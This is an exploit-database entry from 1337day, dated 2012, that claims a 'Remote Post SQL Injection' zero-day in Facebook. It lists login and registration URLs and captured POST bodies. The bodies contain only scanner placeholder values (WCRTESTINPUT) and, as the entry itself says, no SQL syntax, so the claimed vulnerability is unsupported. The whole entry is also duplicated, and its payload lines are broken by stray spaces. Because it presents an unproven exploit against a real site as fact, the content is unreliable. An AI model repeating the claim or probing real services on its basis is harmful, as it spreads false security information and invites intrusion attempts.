-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [x] Official Website: http://www.1337day.com 0
1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1
0 0
1 ========================================== 1
0 I'm Taurus Omar Member From Inj3ct0r TEAM 1
1 ========================================== 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
| |
| C _:_ A | Facebook - Remote Post SQL Injection | C _:_ A |
--------------------------------------------------------------------------
==> ABOUT ME:
--- TAURUS OMAR
--- INDEPENDENT SECURITY RESEARCHER
--- ACCESOILEGAL.BLOGSPOT.COM
--- @omartaurus
--- omar-taurus[at]dragonsecurity[dot]org
--- omar-taurus[at]live[dot]com
===> INFO:
Author : TAURUS OMAR
Category : Webapps / 0day
Title Exploit : Facebook - Remote Post SQL Injection
Vendor : Facebook
URL Vendor : http://www.facebook.com/
0day exploits : 1337day.com Inj3ct0r Exploit DataBase
==> SAMPLE REMOTE POST SQL INJECTION
http://www.facebook.com/login.php?login_attempt=1 [ Remote Post SQL Injection ]
http://www.facebook.com/r.php?possible_fb_user=1 [ Remote Post SQL Injection ]
http://www.facebook.com/r.php?locale=es_LA&possible_fb_user=1 [ Remote Post SQL Injection ]
http://www.facebook.com/find-friends/index.php^jsonp=1 [ Remote Post SQL Injection ]
https://www.facebook.com/r.php?fbpage_id=20531316728 [ Remote Post SQL Injection ]
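==> EXPLOITS (POST bodies as captured; the credential and registration fields hold WCRTESTINPUT placeholder values, and no body contains SQL syntax)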
+amp;extra_2=AdvertisingLink%3ACREATE_AN_AD&charse t_test=€,´,%E2%82%AC,%C2%B4,%E6%B0%B4,% D0%94,%D0%84&timezone=&lgnrnd=172128_Wkmc&lgnjs=n& locale=es_LA&lsd=AVo_L9kt&email=WCRTESTINPUT000000 &pass=WCRTESTINPUT000001&default_persistent=0&next =http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&e xtra_1=not-admgr-user
+trynum=1&charset_test=€,´,%E2%82%AC,%C 2%B4,%E6%B0%B4,%D0%94,%D0%84&timezone=&lgnrnd=1718 06_rfMa&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRT ESTINPUT000001&default_persistent=0&login=Entrar&l sd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0&legacy_return =1&display=&session_key_only=0
+display=&session_key_only=0&trynum=1&charset_test =€,´,€,´,?,?,?&timezone=&lgnrnd=171806_ rfMa&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRTEST INPUT000001&default_persistent=0&login=Entrar&lsd= AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0&legacy_return =1
+login_str=wcrtestinput000000&password=wcrtestinpu t000001&lsd=avo_l9kt&importer_action=2&flow=2&type =1&callback_element_id=&tracked_params=[]
+charset_test=€,´,€,´,?,?,?&timezone=&l gnrnd=171816_HdJ7&lgnjs=n&email=WCRTESTINPUT000000 &pass=WCRTESTINPUT000001&default_persistent=0&logi n=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0&legacy_return =1&display=&session_key_only=0&trynum=1
+legacy_return=1&display=&session_key_only=0&trynu m=1&charset_test=€,´,€,´,?,?,?&timezone =&lgnrnd=171816_HdJ7&lgnjs=n&email=WCRTESTINPUT000 000&pass=WCRTESTINPUT000001&default_persistent=0&l ogin=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0
+r=115+reg_instance=whvet-ygwqujbcwr0iwc_jcb&openid_token=&uo_ip=&key=&re=&m id=&fid=®_dropoff_id=®_dropoff_code=&ro_invi te_signup_id=737818179100220658&terms=on&abtest_re gistration_group=1&referrer=&md5pass=&validate_mx_ records=1&asked_to_login=0&ab_test_data=&firstname =wcrtestinput000000&lastname=wcrtestinput000001&re g_email__=wcrtestinput000002®_email_confirmatio n__=wcrtestinput000003®_passwd__=wcrtestinput00 0004&captcha_persist_data=aznwcfsbvtu_hsnl9ddzwtkd 6b-l6k4sw6w5bf-7m80q4tuehmrrvmaoezd5uw_qan5757cni6lxooxdduakfouj-hhexh-gmmxfsuvdwouj5dkt_hfam-0xgtltzhe1kanr7x1m7s5wfqr75mukog2ylpcxdgo_nyz1-et-whce93nr-ddraaovwntqbpq0p-d-xkbv6-gmuklicm6bdc2zc_ffdx7nysuktmdlqgsutenuvgc3-rndgbfwuv7vlez9uvamllsjvp2hu7lmq2abyguj_prr5vv7euu huq8ebgq1arpbs9t7mdteq17stmys_ovowrc2eno9qzkspeh4b rsgx8oi6lg0yeccwspf4a&captcha_session=cmqamvx4apmp pd9boq5hew&extra_challenge_params=authp=nonce.tt.t ime.new_audio_default&psig=qgnx8ieq-k9hb0c3ceqwfzaavyi&nonce=cmqamvx4apmppd9boq5he w&tt=ducvyhgabbkslmk3pkqnmd16nqi&time=1339 980632&new_audio_default=1&recaptcha_type=pass word&captcha_response=wcrtestinput000005&sex=0&bir thday_day=-1&birthday_month=-1&birthday_year=-1&lsd=avo_l9kt&invid=&a=&oi=&locale=es_la&app_bund le=&app_data=®_data=&app_id=&fbpage_id=20531316 728®_oid=20531316728
# 1337day.com [2012-06-18]
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [x] Official Website: http://www.1337day.com 0
1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1
0 0
1 ========================================== 1
0 I'm Taurus Omar Member From Inj3ct0r TEAM 1
1 ========================================== 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
| |
| C _:_ A | Facebook - Remote Post SQL Injection | C _:_ A |
--------------------------------------------------------------------------
==> ABOUT ME:
--- TAURUS OMAR
--- INDEPENDENT SECURITY RESEARCHER
--- ACCESOILEGAL.BLOGSPOT.COM
--- @omartaurus
--- omar-taurus[at]dragonsecurity[dot]org
--- omar-taurus[at]live[dot]com
===> INFO:
Author : TAURUS OMAR
Category : Webapps / 0day
Title Exploit : Facebook - Remote Post SQL Injection
Vendor : Facebook
URL Vendor : http://www.facebook.com/
0day exploits : 1337day.com Inj3ct0r Exploit DataBase
==> SAMPLE REMOTE POST SQL INJECTION
http://www.facebook.com/login.php?login_attempt=1 [ Remote Post SQL Injection ]
http://www.facebook.com/r.php?possible_fb_user=1 [ Remote Post SQL Injection ]
http://www.facebook.com/r.php?locale=es_LA&possible_fb_user=1 [ Remote Post SQL Injection ]
http://www.facebook.com/find-friends/index.php^jsonp=1 [ Remote Post SQL Injection ]
https://www.facebook.com/r.php?fbpage_id=20531316728 [ Remote Post SQL Injection ]
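==> EXPLOITS (POST bodies as captured; the credential and registration fields hold WCRTESTINPUT placeholder values, and no body contains SQL syntax)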
+amp;extra_2=AdvertisingLink%3ACREATE_AN_AD&charse t_test=€,´,%E2%82%AC,%C2%B4,%E6%B0%B4,% D0%94,%D0%84&timezone=&lgnrnd=172128_Wkmc&lgnjs=n& locale=es_LA&lsd=AVo_L9kt&email=WCRTESTINPUT000000 &pass=WCRTESTINPUT000001&default_persistent=0&next =http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&e xtra_1=not-admgr-user
+trynum=1&charset_test=€,´,%E2%82%AC,%C 2%B4,%E6%B0%B4,%D0%94,%D0%84&timezone=&lgnrnd=1718 06_rfMa&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRT ESTINPUT000001&default_persistent=0&login=Entrar&l sd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0&legacy_return =1&display=&session_key_only=0
+display=&session_key_only=0&trynum=1&charset_test =€,´,€,´,?,?,?&timezone=&lgnrnd=171806_ rfMa&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRTEST INPUT000001&default_persistent=0&login=Entrar&lsd= AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0&legacy_return =1
+login_str=wcrtestinput000000&password=wcrtestinpu t000001&lsd=avo_l9kt&importer_action=2&flow=2&type =1&callback_element_id=&tracked_params=[]
+charset_test=€,´,€,´,?,?,?&timezone=&l gnrnd=171816_HdJ7&lgnjs=n&email=WCRTESTINPUT000000 &pass=WCRTESTINPUT000001&default_persistent=0&logi n=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0&legacy_return =1&display=&session_key_only=0&trynum=1
+legacy_return=1&display=&session_key_only=0&trynu m=1&charset_test=€,´,€,´,?,?,?&timezone =&lgnrnd=171816_HdJ7&lgnjs=n&email=WCRTESTINPUT000 000&pass=WCRTESTINPUT000001&default_persistent=0&l ogin=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0
+r=115+reg_instance=whvet-ygwqujbcwr0iwc_jcb&openid_token=&uo_ip=&key=&re=&m id=&fid=®_dropoff_id=®_dropoff_code=&ro_invi te_signup_id=737818179100220658&terms=on&abtest_re gistration_group=1&referrer=&md5pass=&validate_mx_ records=1&asked_to_login=0&ab_test_data=&firstname =wcrtestinput000000&lastname=wcrtestinput000001&re g_email__=wcrtestinput000002®_email_confirmatio n__=wcrtestinput000003®_passwd__=wcrtestinput00 0004&captcha_persist_data=aznwcfsbvtu_hsnl9ddzwtkd 6b-l6k4sw6w5bf-7m80q4tuehmrrvmaoezd5uw_qan5757cni6lxooxdduakfouj-hhexh-gmmxfsuvdwouj5dkt_hfam-0xgtltzhe1kanr7x1m7s5wfqr75mukog2ylpcxdgo_nyz1-et-whce93nr-ddraaovwntqbpq0p-d-xkbv6-gmuklicm6bdc2zc_ffdx7nysuktmdlqgsutenuvgc3-rndgbfwuv7vlez9uvamllsjvp2hu7lmq2abyguj_prr5vv7euu huq8ebgq1arpbs9t7mdteq17stmys_ovowrc2eno9qzkspeh4b rsgx8oi6lg0yeccwspf4a&captcha_session=cmqamvx4apmp pd9boq5hew&extra_challenge_params=authp=nonce.tt.t ime.new_audio_default&psig=qgnx8ieq-k9hb0c3ceqwfzaavyi&nonce=cmqamvx4apmppd9boq5he w&tt=ducvyhgabbkslmk3pkqnmd16nqi&time=1339 980632&new_audio_default=1&recaptcha_type=pass word&captcha_response=wcrtestinput000005&sex=0&bir thday_day=-1&birthday_month=-1&birthday_year=-1&lsd=avo_l9kt&invid=&a=&oi=&locale=es_la&app_bund le=&app_data=®_data=&app_id=&fbpage_id=20531316 728®_oid=20531316728
# 1337day.com [2012-06-18]